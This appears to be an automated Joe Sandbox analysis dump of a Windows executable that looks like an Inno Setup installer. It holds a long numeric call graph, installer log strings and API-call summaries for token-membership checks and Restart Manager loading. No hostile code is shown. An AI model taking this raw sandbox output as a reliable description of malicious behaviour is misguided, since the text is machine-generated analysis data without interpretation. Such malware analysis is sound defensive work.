53674->50730 53674->50731 53676 431bd6 53675->53676 53677 402648 18 API calls 53676->53677 53678 431c06 53677->53678 53679 4947f8 53678->53679 53680 4948cd 53679->53680 53681 494812 53679->53681 53686 494910 53680->53686 53681->53680 53683 433d6c 18 API calls 53681->53683 53685 403450 18 API calls 53681->53685 53714 408c0c 18 API calls 53681->53714 53715 431ca0 53681->53715 53683->53681 53685->53681 53687 49492c 53686->53687 53723 433d6c 53687->53723 53689 494931 53690 431ca0 18 API calls 53689->53690 53691 49493c 53690->53691 53692 43d594 53691->53692 53693 43d5c1 53692->53693 53694 43d5b3 53692->53694 53693->50741 53694->53693 53695 43d63d 53694->53695 53699 447084 18 API calls 53694->53699 53702 43d6f7 53695->53702 53726 447084 53695->53726 53697 43d688 53732 43dd50 53697->53732 53699->53694 53700 43d8fd 53700->53693 53752 447024 18 API calls 53700->53752 53702->53700 53703 43d8de 53702->53703 53750 447024 18 API calls 53702->53750 53751 447024 18 API calls 53703->53751 53706->50743 53707->50745 53708->50732 53710 403494 4 API calls 53709->53710 53712 431efb 53710->53712 53711 431f25 53711->53672 53712->53711 53713 403744 18 API calls 53712->53713 53713->53712 53714->53681 53716 431cc0 53715->53716 53717 431cae 53715->53717 53719 431ce2 53716->53719 53722 431c40 18 API calls 53716->53722 53721 402678 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53717->53721 53719->53681 53721->53716 53722->53719 53724 402648 18 API calls 53723->53724 53725 433d7b 53724->53725 53725->53689 53727 4470a3 53726->53727 53728 4470aa 53726->53728 53753 446e30 18 API calls 53727->53753 53730 431ca0 18 API calls 53728->53730 53731 4470ba 53730->53731 53731->53697 53733 43dd6c 53732->53733 53738 43dd99 53732->53738 53734 402660 4 API calls 53733->53734 53733->53738 53734->53733 53735 43ddce 53735->53702 53737 43fea5 53737->53735 53763 447024 18 API calls 53737->53763 53738->53735 53738->53737 53739 43c938 18 API calls 53738->53739 53740 447024 18 API calls 53738->53740 53742 433b18 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53738->53742 53745 446e30 18 API calls 53738->53745 53747 433d18 18 API calls 53738->53747 53748 436650 18 API calls 53738->53748 53749 431c40 18 API calls 53738->53749 53754 4396e0 53738->53754 53760 436e4c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53738->53760 53761 43dc48 32 API calls 53738->53761 53762 433d34 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53738->53762 53739->53738 53740->53738 53742->53738 53745->53738 53747->53738 53748->53738 53749->53738 53750->53702 53751->53700 53752->53700 53753->53728 53755 4396e9 53754->53755 53756 403400 4 API calls 53755->53756 53760->53738 53761->53738 53762->53738 53763->53737 53766 41fb58 53767 41fb61 53766->53767 53770 41fdfc 53767->53770 53769 41fb6e 53771 41feee 53770->53771 53772 41fe13 53770->53772 53771->53769 53772->53771 53791 41f9bc GetWindowLongA GetSystemMetrics GetSystemMetrics GetWindowLongA 53772->53791 53774 41fe49 53775 41fe73 53774->53775 53776 41fe4d 53774->53776 53801 41f9bc GetWindowLongA GetSystemMetrics GetSystemMetrics GetWindowLongA 53775->53801 53792 41fb9c 53776->53792 53780 41fe81 53782 41fe85 53780->53782 53783 41feab 53780->53783 53781 41fb9c 10 API calls 53790 41fe71 53781->53790 53784 41fb9c 10 API calls 53782->53784 53785 41fb9c 10 API calls 53783->53785 53786 41fe97 53784->53786 53787 41febd 53785->53787 53789 41fb9c 10 API calls 53786->53789 53788 41fb9c 10 API calls 53787->53788 53788->53790 53789->53790 53790->53769 53791->53774 53793 41fbb7 53792->53793 53794 41fbcd 53793->53794 53795 41f93c 4 API calls 53793->53795 53802 41f93c 53794->53802 53795->53794 53797 41fc15 53798 41fc38 SetScrollInfo 53797->53798 53810 41fa9c 53798->53810 53801->53780 53803 4181e0 53802->53803 53804 41f959 GetWindowLongA 53803->53804 53805 41f996 53804->53805 53806 41f976 53804->53806 53822 41f8c8 GetWindowLongA GetSystemMetrics GetSystemMetrics 53805->53822 53821 41f8c8 GetWindowLongA GetSystemMetrics GetSystemMetrics 53806->53821 53809 41f982 53809->53797 53811 41faaa 53810->53811 53812 41fab2 53810->53812 53811->53781 53813 41faf1 53812->53813 53814 41fae1 53812->53814 53820 41faef 53812->53820 53824 417e48 IsWindowVisible ScrollWindow SetWindowPos 53813->53824 53823 417e48 IsWindowVisible ScrollWindow SetWindowPos 53814->53823 53815 41fb31 GetScrollPos 53815->53811 53818 41fb3c 53815->53818 53819 41fb4b SetScrollPos 53818->53819 53819->53811 53820->53815 53821->53809 53822->53809 53823->53820 53824->53820 53825 420598 53826 4205ab 53825->53826 53846 415b30 53826->53846 53828 4206f2 53829 420709 53828->53829 53853 4146d4 KiUserCallbackDispatcher 53828->53853 53833 420720 53829->53833 53854 414718 KiUserCallbackDispatcher 53829->53854 53830 420651 53851 420848 34 API calls 53830->53851 53831 4205e6 53831->53828 53831->53830 53839 420642 MulDiv 53831->53839 53835 420742 53833->53835 53855 420060 12 API calls 53833->53855 53837 42066a 53837->53828 53852 420060 12 API calls 53837->53852 53850 41a304 19 API calls 53839->53850 53842 420687 53843 4206a3 MulDiv 53842->53843 53844 4206c6 53842->53844 53843->53844 53844->53828 53845 4206cf MulDiv 53844->53845 53845->53828 53847 415b42 53846->53847 53856 414470 53847->53856 53849 415b5a 53849->53831 53850->53830 53851->53837 53852->53842 53853->53829 53854->53833 53855->53835 53857 41448a 53856->53857 53860 410458 53857->53860 53859 4144a0 53859->53849 53863 40dca4 53860->53863 53862 41045e 53862->53859 53864 40dd06 53863->53864 53865 40dcb7 53863->53865 53870 40dd14 53864->53870 53868 40dd14 33 API calls 53865->53868 53869 40dce1 53868->53869 53869->53862 53871 40dd24 53870->53871 53873 40dd3a 53871->53873 53882 40e09c 53871->53882 53898 40d5e0 53871->53898 53901 40df4c 53873->53901 53876 40d5e0 19 API calls 53877 40dd42 53876->53877 53877->53876 53878 40ddae 53877->53878 53904 40db60 53877->53904 53879 40df4c 19 API calls 53878->53879 53881 40dd10 53879->53881 53881->53862 53918 40e96c 53882->53918 53884 403778 18 API calls 53886 40e0d7 53884->53886 53885 40e18d 53887 40e1b7 53885->53887 53888 40e1a8 53885->53888 53886->53884 53886->53885 53981 40d774 19 API calls 53886->53981 53982 40e080 19 API calls 53886->53982 53978 40ba24 53887->53978 53927 40e3c0 53888->53927 53894 40e1b5 53895 403400 4 API calls 53894->53895 53896 40e25c 53895->53896 53896->53871 53899 40ea08 19 API calls 53898->53899 53900 40d5ea 53899->53900 53900->53871 54015 40d4bc 53901->54015 54024 40df54 53904->54024 53907 40e96c 19 API calls 53908 40db9e 53907->53908 53909 40e96c 19 API calls 53908->53909 53910 40dba9 53909->53910 53911 40dbc4 53910->53911 53912 40dbbb 53910->53912 53917 40dbc1 53910->53917 54031 40d9d8 53911->54031 54034 40dac8 33 API calls 53912->54034 53915 403420 4 API calls 53916 40dc8f 53915->53916 53916->53877 53917->53915 53984 40d780 53918->53984 53921 4034e0 18 API calls 53922 40e98f 53921->53922 53923 403744 18 API calls 53922->53923 53924 40e996 53923->53924 53925 40d780 19 API calls 53924->53925 53926 40e9a4 53925->53926 53926->53886 53928 40e3ec 53927->53928 53930 40e3f6 53927->53930 53989 40d440 19 API calls 53928->53989 53931 40e511 53930->53931 53932 40e495 53930->53932 53933 40e4f6 53930->53933 53934 40e576 53930->53934 53935 40e438 53930->53935 53936 40e4d9 53930->53936 53937 40e47a 53930->53937 53938 40e4bb 53930->53938 53949 40e45c 53930->53949 53941 40d764 19 API calls 53931->53941 53997 40de24 19 API calls 53932->53997 54002 40e890 19 API calls 53933->54002 53945 40d764 19 API calls 53934->53945 53990 40d764 53935->53990 54000 40e9a8 19 API calls 53936->54000 53996 40d818 19 API calls 53937->53996 53999 40dde4 19 API calls 53938->53999 53950 40e519 53941->53950 53944 403400 4 API calls 53951 40e5eb 53944->53951 53952 40e57e 53945->53952 53948 40e4a0 53998 40d470 19 API calls 53948->53998 53949->53944 53958 40e523 53950->53958 53959 40e51d 53950->53959 53951->53894 53960 40e582 53952->53960 53961 40e59b 53952->53961 53953 40e4e4 54001 409d38 18 API calls 53953->54001 53955 40e461 53995 40ded8 19 API calls 53955->53995 53956 40e444 53993 40de24 19 API calls 53956->53993 54003 40ea08 53958->54003 53966 40e521 53959->53966 53967 40e53c 53959->53967 53969 40ea08 19 API calls 53960->53969 54009 40de24 19 API calls 53961->54009 54007 40de24 19 API calls 53966->54007 53970 40ea08 19 API calls 53967->53970 53969->53949 53972 40e544 53970->53972 53971 40e44f 53994 40e26c 19 API calls 53971->53994 54006 40d8a0 19 API calls 53972->54006 53975 40e566 54008 40e2d4 18 API calls 53975->54008 54010 40b9d0 53978->54010 53981->53886 53982->53886 53983 40d774 19 API calls 53983->53894 53987 40d78b 53984->53987 53985 40d7c5 53985->53921 53987->53985 53988 40d7cc 19 API calls 53987->53988 53988->53987 53989->53930 53991 40ea08 19 API calls 53990->53991 53992 40d76e 53991->53992 53992->53955 53992->53956 53993->53971 53994->53949 53995->53949 53996->53949 53997->53948 53998->53949 53999->53949 54000->53953 54001->53949 54002->53949 54004 40d780 19 API calls 54003->54004 54005 40ea15 54004->54005 54005->53949 54006->53949 54007->53975 54008->53949 54009->53949 54011 40b9e2 54010->54011 54013 40ba07 54010->54013 54011->54013 54014 40ba84 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54011->54014 54013->53894 54013->53983 54014->54013 54016 40ea08 19 API calls 54015->54016 54018 40d4c9 54016->54018 54017 40d4dc 54017->53877 54018->54017 54022 40eb0c 19 API calls 54018->54022 54020 40d4d7 54023 40d458 19 API calls 54020->54023 54022->54020 54023->54017 54025 40d764 19 API calls 54024->54025 54026 40df6b 54025->54026 54027 40ea08 19 API calls 54026->54027 54030 40db93 54026->54030 54028 40df78 54027->54028 54028->54030 54035 40ded8 19 API calls 54028->54035 54030->53907 54036 40ab7c 33 API calls 54031->54036 54033 40da00 54033->53917 54034->53917 54035->54030 54036->54033 56241 40ce7c 56242 40ce84 56241->56242 56243 40ceae 56242->56243 56244 40ceb2 56242->56244 56245 40cea7 56242->56245 56247 40ceb6 56244->56247 56248 40cec8 56244->56248 56254 406288 GlobalHandle GlobalUnlock GlobalFree 56245->56254 56253 40625c GlobalAlloc GlobalLock 56247->56253 56255 40626c GlobalHandle GlobalUnlock GlobalReAlloc GlobalLock 56248->56255 56251 40cec4 56251->56243 56252 408cbc 19 API calls 56251->56252 56252->56243 56253->56251 56254->56243 56255->56251 56256 41363c SetWindowLongA GetWindowLongA 56257 413699 SetPropA SetPropA 56256->56257 56258 41367b GetWindowLongA 56256->56258 56263 41f39c 56257->56263 56258->56257 56259 41368a SetWindowLongA 56258->56259 56259->56257 56268 415270 56263->56268 56275 423c0c 56263->56275 56369 423a84 56263->56369 56264 4136e9 56269 41527d 56268->56269 56270 4152e3 56269->56270 56271 4152d8 56269->56271 56274 4152e1 56269->56274 56376 424b8c 13 API calls 56270->56376 56271->56274 56377 41505c 60 API calls 56271->56377 56274->56264 56278 423c42 56275->56278 56294 423c63 56278->56294 56378 423b68 56278->56378 56279 423cec 56281 423cf3 56279->56281 56282 423d27 56279->56282 56280 423c8d 56283 423c93 56280->56283 56284 423d50 56280->56284 56289 423cf9 56281->56289 56327 423fb1 56281->56327 56285 423d32 56282->56285 56286 42409a IsIconic 56282->56286 56290 423cc5 56283->56290 56291 423c98 56283->56291 56287 423d62 56284->56287 56288 423d6b 56284->56288 56292 4240d6 56285->56292 56293 423d3b 56285->56293 56286->56294 56298 4240ae GetFocus 56286->56298 56295 423d78 56287->56295 56296 423d69 56287->56296 56385 424194 11 API calls 56288->56385 56299 423f13 SendMessageA 56289->56299 56300 423d07 56289->56300 56290->56294 56318 423cde 56290->56318 56319 423e3f 56290->56319 56301 423df6 56291->56301 56302 423c9e 56291->56302 56399 424850 WinHelpA PostMessageA 56292->56399 56304 4240ed 56293->56304 56328 423cc0 56293->56328 56294->56264 56305 4241dc 11 API calls 56295->56305 56386 423b84 NtdllDefWindowProc_A 56296->56386 56298->56294 56306 4240bf 56298->56306 56299->56294 56300->56294 56300->56328 56349 423f56 56300->56349 56390 423b84 NtdllDefWindowProc_A 56301->56390 56307 423ca7 56302->56307 56308 423e1e PostMessageA 56302->56308 56316 4240f6 56304->56316 56317 42410b 56304->56317 56305->56294 56398 41eff4 GetCurrentThreadId EnumThreadWindows 56306->56398 56313 423cb0 56307->56313 56314 423ea5 56307->56314 56391 423b84 NtdllDefWindowProc_A 56308->56391 56322 423cb9 56313->56322 56323 423dce IsIconic 56313->56323 56324 423eae 56314->56324 56325 423edf 56314->56325 56315 423e39 56315->56294 56326 4244d4 19 API calls 56316->56326 56400 42452c LocalAlloc TlsSetValue TlsGetValue TlsGetValue SendMessageA 56317->56400 56318->56328 56329 423e0b 56318->56329 56382 423b84 NtdllDefWindowProc_A 56319->56382 56321 4240c6 56321->56294 56333 4240ce SetFocus 56321->56333 56322->56328 56334 423d91 56322->56334 56336 423dea 56323->56336 56337 423dde 56323->56337 56393 423b14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue SetWindowPos 56324->56393 56383 423b84 NtdllDefWindowProc_A 56325->56383 56326->56294 56327->56294 56343 423fd7 IsWindowEnabled 56327->56343 56328->56294 56384 423b84 NtdllDefWindowProc_A 56328->56384 56331 424178 26 API calls 56329->56331 56331->56294 56332 423e45 56340 423e83 56332->56340 56341 423e61 56332->56341 56333->56294 56334->56294 56387 422c4c ShowWindow PostMessageA PostQuitMessage 56334->56387 56389 423b84 NtdllDefWindowProc_A 56336->56389 56388 423bc0 29 API calls 56337->56388 56350 423a84 6 API calls 56340->56350 56392 423b14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue SetWindowPos 56341->56392 56342 423eb6 56352 423ec8 56342->56352 56359 41ef58 6 API calls 56342->56359 56343->56294 56353 423fe5 56343->56353 56346 423ee5 56347 423efd 56346->56347 56354 41eea4 2 API calls 56346->56354 56355 423a84 6 API calls 56347->56355 56349->56294 56357 423f78 IsWindowEnabled 56349->56357 56358 423e8b PostMessageA 56350->56358 56394 423b84 NtdllDefWindowProc_A 56352->56394 56362 423fec IsWindowVisible 56353->56362 56354->56347 56355->56294 56356 423e69 PostMessageA 56356->56294 56357->56294 56361 423f86 56357->56361 56358->56294 56359->56352 56395 412310 21 API calls 56361->56395 56362->56294 56364 423ffa GetFocus 56362->56364 56365 4181e0 56364->56365 56366 42400f SetFocus 56365->56366 56396 415240 56366->56396 56370 423b0d 56369->56370 56371 423a94 56369->56371 56370->56264 56371->56370 56372 423a9a EnumWindows 56371->56372 56372->56370 56373 423ab6 GetWindow GetWindowLongA 56372->56373 56401 423a1c GetWindow 56372->56401 56374 423ad5 56373->56374 56374->56370 56375 423b01 SetWindowPos 56374->56375 56375->56370 56375->56374 56376->56274 56377->56274 56379 423b72 56378->56379 56380 423b7d 56378->56380 56379->56380 56381 408720 21 API calls 56379->56381 56380->56279 56380->56280 56381->56380 56382->56332 56383->56346 56384->56294 56385->56294 56386->56294 56387->56294 56388->56294 56389->56294 56390->56294 56391->56315 56392->56356 56393->56342 56394->56294 56395->56294 56397 41525b SetFocus 56396->56397 56397->56294 56398->56321 56399->56315 56400->56315 56402 423a3d GetWindowLongA 56401->56402 56403 423a49 56401->56403 56402->56403 56404 4809f7 56405 480a00 56404->56405 56407 480a2b 56404->56407 56406 480a1d 56405->56406 56405->56407 56776 476c50 203 API calls 56406->56776 56408 480a6a 56407->56408 56778 47f4a4 18 API calls 56407->56778 56409 480a8e 56408->56409 56412 480a81 56408->56412 56413 480a83 56408->56413 56418 480aca 56409->56418 56419 480aac 56409->56419 56422 47f4e8 56 API calls 56412->56422 56780 47f57c 56 API calls 56413->56780 56414 480a22 56414->56407 56777 408be0 19 API calls 56414->56777 56415 480a5d 56779 47f50c 56 API calls 56415->56779 56783 47f33c 38 API calls 56418->56783 56423 480ac1 56419->56423 56781 47f50c 56 API calls 56419->56781 56422->56409 56782 47f33c 38 API calls 56423->56782 56426 480ac8 56427 480ada 56426->56427 56428 480ae0 56426->56428 56429 480ade 56427->56429 56433 47f4e8 56 API calls 56427->56433 56428->56429 56431 47f4e8 56 API calls 56428->56431 56530 47c66c 56429->56530 56431->56429 56433->56429 56531 42d898 GetWindowsDirectoryA 56530->56531 56532 47c690 56531->56532 56533 403450 18 API calls 56532->56533 56534 47c69d 56533->56534 56535 42d8c4 GetSystemDirectoryA 56534->56535 56536 47c6a5 56535->56536 56537 403450 18 API calls 56536->56537 56538 47c6b2 56537->56538 56539 42d8f0 6 API calls 56538->56539 56540 47c6ba 56539->56540 56541 403450 18 API calls 56540->56541 56542 47c6c7 56541->56542 56543 47c6d0 56542->56543 56544 47c6ec 56542->56544 56815 42d208 56543->56815 56546 403400 4 API calls 56544->56546 56548 47c6ea 56546->56548 56550 47c731 56548->56550 56552 42c8cc 19 API calls 56548->56552 56549 403450 18 API calls 56549->56548 56795 47c4f4 56550->56795 56554 47c70c 56552->56554 56556 403450 18 API calls 56554->56556 56555 403450 18 API calls 56557 47c74d 56555->56557 56558 47c719 56556->56558 56559 47c76b 56557->56559 56560 4035c0 18 API calls 56557->56560 56558->56550 56562 403450 18 API calls 56558->56562 56561 47c4f4 22 API calls 56559->56561 56560->56559 56563 47c77a 56561->56563 56562->56550 56564 403450 18 API calls 56563->56564 56565 47c787 56564->56565 56566 47c7af 56565->56566 56568 42c3fc 19 API calls 56565->56568 56567 47c816 56566->56567 56569 47c4f4 22 API calls 56566->56569 56571 47c8de 56567->56571 56572 47c836 SHGetKnownFolderPath 56567->56572 56570 47c79d 56568->56570 56573 47c7c7 56569->56573 56576 4035c0 18 API calls 56570->56576 56574 47c8e7 56571->56574 56575 47c908 56571->56575 56577 47c850 56572->56577 56578 47c88b SHGetKnownFolderPath 56572->56578 56579 403450 18 API calls 56573->56579 56576->56566 56825 403ba4 21 API calls 56577->56825 56578->56571 56585 47c8a5 56578->56585 56584 47c7d4 56579->56584 56776->56414 56778->56415 56779->56408 56780->56409 56781->56423 56782->56426 56783->56426 56796 42de1c RegOpenKeyExA 56795->56796 56797 47c51a 56796->56797 56798 47c540 56797->56798 56799 47c51e 56797->56799 56800 403400 4 API calls 56798->56800 56801 42dd4c 20 API calls 56799->56801 56802 47c547 56800->56802 56803 47c52a 56801->56803 56802->56555 56804 47c535 RegCloseKey 56803->56804 56805 403400 4 API calls 56803->56805 56804->56802 56805->56804 56816 4038a4 18 API calls 56815->56816 56817 42d21b 56816->56817 56818 42d232 GetEnvironmentVariableA 56817->56818 56822 42d245 56817->56822 56827 42dbd0 18 API calls 56817->56827 56818->56817 56819 42d23e 56818->56819 56821 403400 4 API calls 56819->56821 56821->56822 56822->56549 56827->56817
                                                                                                      Strings
                                                                                                      • User opted not to strip the existing file's read-only attribute. Skipping., xrefs: 00470E96
                                                                                                      • Dest filename: %s, xrefs: 00470894
                                                                                                      • Installing into GAC, xrefs: 00471714
                                                                                                      • Skipping due to "onlyifdoesntexist" flag., xrefs: 004709CE
                                                                                                      • .tmp, xrefs: 00470FB7
                                                                                                      • Existing file's SHA-1 hash is different from our file. Proceeding., xrefs: 00470CC4
                                                                                                      • User opted not to overwrite the existing file. Skipping., xrefs: 00470E4D
                                                                                                      • , xrefs: 00470BCF, 00470DA0, 00470E1E
                                                                                                      • Non-default bitness: 32-bit, xrefs: 004708BB
                                                                                                      • Same version. Skipping., xrefs: 00470CE5
                                                                                                      • Time stamp of existing file: %s, xrefs: 00470A2B
                                                                                                      • Will register the file (a type library) later., xrefs: 00471513
                                                                                                      • -- File entry --, xrefs: 004706FB
                                                                                                      • Version of existing file: %u.%u.%u.%u, xrefs: 00470B7C
                                                                                                      • Time stamp of our file: (failed to read), xrefs: 004709A7
                                                                                                      • Existing file is a newer version. Skipping., xrefs: 00470C02
                                                                                                      • Time stamp of our file: %s, xrefs: 0047099B
                                                                                                      • Version of our file: (none), xrefs: 00470AFC
                                                                                                      • Existing file is protected by Windows File Protection. Skipping., xrefs: 00470DEC
                                                                                                      • Existing file's SHA-1 hash matches our file. Skipping., xrefs: 00470CB5
                                                                                                      • Version of our file: %u.%u.%u.%u, xrefs: 00470AF0
                                                                                                      • Dest file exists., xrefs: 004709BB
                                                                                                      • Skipping due to "onlyifdestfileexists" flag., xrefs: 00470EFA
                                                                                                      • Stripped read-only attribute., xrefs: 00470EC7
                                                                                                      • Time stamp of existing file: (failed to read), xrefs: 00470A37
                                                                                                      • Non-default bitness: 64-bit, xrefs: 004708AF
                                                                                                      • InUn, xrefs: 0047115F
                                                                                                      • Same time stamp. Skipping., xrefs: 00470D55
                                                                                                      • @, xrefs: 004707B0
                                                                                                      • Installing the file., xrefs: 00470F09
                                                                                                      • Failed to read existing file's SHA-1 hash. Proceeding., xrefs: 00470CD0
                                                                                                      • Couldn't read time stamp. Skipping., xrefs: 00470D35
                                                                                                      • Existing file has a later time stamp. Skipping., xrefs: 00470DCF
                                                                                                      • Incrementing shared file count (32-bit)., xrefs: 004715A5
                                                                                                      • Incrementing shared file count (64-bit)., xrefs: 0047158C
                                                                                                      • Version of existing file: (none), xrefs: 00470CFA
                                                                                                      • Failed to strip read-only attribute., xrefs: 00470ED3
                                                                                                      • Uninstaller requires administrator: %s, xrefs: 0047118F
                                                                                                      • Dest file is protected by Windows File Protection., xrefs: 004708ED
                                                                                                      • Will register the file (a DLL/OCX) later., xrefs: 0047151F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: $-- File entry --$.tmp$@$Couldn't read time stamp. Skipping.$Dest file exists.$Dest file is protected by Windows File Protection.$Dest filename: %s$Existing file has a later time stamp. Skipping.$Existing file is a newer version. Skipping.$Existing file is protected by Windows File Protection. Skipping.$Existing file's SHA-1 hash is different from our file. Proceeding.$Existing file's SHA-1 hash matches our file. Skipping.$Failed to read existing file's SHA-1 hash. Proceeding.$Failed to strip read-only attribute.$InUn$Incrementing shared file count (32-bit).$Incrementing shared file count (64-bit).$Installing into GAC$Installing the file.$Non-default bitness: 32-bit$Non-default bitness: 64-bit$Same time stamp. Skipping.$Same version. Skipping.$Skipping due to "onlyifdestfileexists" flag.$Skipping due to "onlyifdoesntexist" flag.$Stripped read-only attribute.$Time stamp of existing file: %s$Time stamp of existing file: (failed to read)$Time stamp of our file: %s$Time stamp of our file: (failed to read)$Uninstaller requires administrator: %s$User opted not to overwrite the existing file. Skipping.$User opted not to strip the existing file's read-only attribute. Skipping.$Version of existing file: %u.%u.%u.%u$Version of existing file: (none)$Version of our file: %u.%u.%u.%u$Version of our file: (none)$Will register the file (a DLL/OCX) later.$Will register the file (a type library) later.
                                                                                                      • API String ID: 0-4021121268
                                                                                                      • Opcode ID: cebd1a573a13cfb1480ab73f2a07467b13e4d984594641078933206a2f2f5451
                                                                                                      • Instruction ID: 04e5041402f80353ef90c659d92e8d378e84d4fed116f8838aecbbc27e5febe3
                                                                                                      • Opcode Fuzzy Hash: cebd1a573a13cfb1480ab73f2a07467b13e4d984594641078933206a2f2f5451
                                                                                                      • Instruction Fuzzy Hash: 31927574A0424CDFDB21DFA9C445BDDBBB5AF05304F1480ABE848A7392D7789E49CB19

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 1578 42e09c-42e0ad 1579 42e0b8-42e0dd AllocateAndInitializeSid 1578->1579 1580 42e0af-42e0b3 1578->1580 1581 42e287-42e28f 1579->1581 1582 42e0e3-42e100 GetVersion 1579->1582 1580->1581 1583 42e102-42e117 GetModuleHandleA GetProcAddress 1582->1583 1584 42e119-42e11b 1582->1584 1583->1584 1585 42e142-42e15c GetCurrentThread OpenThreadToken 1584->1585 1586 42e11d-42e12b CheckTokenMembership 1584->1586 1589 42e193-42e1bb GetTokenInformation 1585->1589 1590 42e15e-42e168 GetLastError 1585->1590 1587 42e131-42e13d 1586->1587 1588 42e269-42e27f FreeSid 1586->1588 1587->1588 1591 42e1d6-42e1fa call 402648 GetTokenInformation 1589->1591 1592 42e1bd-42e1c5 GetLastError 1589->1592 1593 42e174-42e187 GetCurrentProcess OpenProcessToken 1590->1593 1594 42e16a-42e16f call 4031bc 1590->1594 1605 42e208-42e210 1591->1605 1606 42e1fc-42e206 call 4031bc * 2 1591->1606 1592->1591 1595 42e1c7-42e1d1 call 4031bc * 2 1592->1595 1593->1589 1598 42e189-42e18e call 4031bc 1593->1598 1594->1581 1595->1581 1598->1581 1607 42e212-42e213 1605->1607 1608 42e243-42e261 call 402660 CloseHandle 1605->1608 1606->1581 1611 42e215-42e228 EqualSid 1607->1611 1615 42e22a-42e237 1611->1615 1616 42e23f-42e241 1611->1616 1615->1616 1619 42e239-42e23d 1615->1619 1616->1608 1616->1611 1619->1608
                                                                                                      APIs
                                                                                                      • AllocateAndInitializeSid.ADVAPI32(00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E0D6
                                                                                                      • GetVersion.KERNEL32(00000000,0042E280,?,00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E0F3
                                                                                                      • GetModuleHandleA.KERNEL32(advapi32.dll,CheckTokenMembership,00000000,0042E280,?,00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E10C
                                                                                                      • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042E112
                                                                                                      • CheckTokenMembership.KERNELBASE(00000000,00000000,?,00000000,0042E280,?,00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E127
                                                                                                      • FreeSid.ADVAPI32(00000000,0042E287,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E27A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressAllocateCheckFreeHandleInitializeMembershipModuleProcTokenVersion
                                                                                                      • String ID: CheckTokenMembership$advapi32.dll
                                                                                                      • API String ID: 2252812187-1888249752
                                                                                                      • Opcode ID: a9f409996ddfe82e0213da269ff1de212d34eb3ec341ac20085b7d7d2472ef68
                                                                                                      • Instruction ID: e5677345bf142a8b1d9111380f95962c8bb8cf61ba8e960ca5c3fd0f127139eb
                                                                                                      • Opcode Fuzzy Hash: a9f409996ddfe82e0213da269ff1de212d34eb3ec341ac20085b7d7d2472ef68
                                                                                                      • Instruction Fuzzy Hash: E351A271B44215EEEB10EAE69C42BBF77ACEB09704F9404BBB901F7281D57C99018B79

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 1642 4502c0-4502cd 1643 4502d3-4502e0 GetVersion 1642->1643 1644 45037c-450386 1642->1644 1643->1644 1645 4502e6-4502fc LoadLibraryA 1643->1645 1645->1644 1646 4502fe-450377 GetProcAddress * 6 1645->1646 1646->1644
                                                                                                      APIs
                                                                                                      • GetVersion.KERNEL32(00480B52), ref: 004502D3
                                                                                                      • LoadLibraryA.KERNEL32(Rstrtmgr.dll,00480B52), ref: 004502EB
                                                                                                      • GetProcAddress.KERNEL32(6EB60000,RmStartSession), ref: 00450309
                                                                                                      • GetProcAddress.KERNEL32(6EB60000,RmRegisterResources), ref: 0045031E
                                                                                                      • GetProcAddress.KERNEL32(6EB60000,RmGetList), ref: 00450333
                                                                                                      • GetProcAddress.KERNEL32(6EB60000,RmShutdown), ref: 00450348
                                                                                                      • GetProcAddress.KERNEL32(6EB60000,RmRestart), ref: 0045035D
                                                                                                      • GetProcAddress.KERNEL32(6EB60000,RmEndSession), ref: 00450372
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
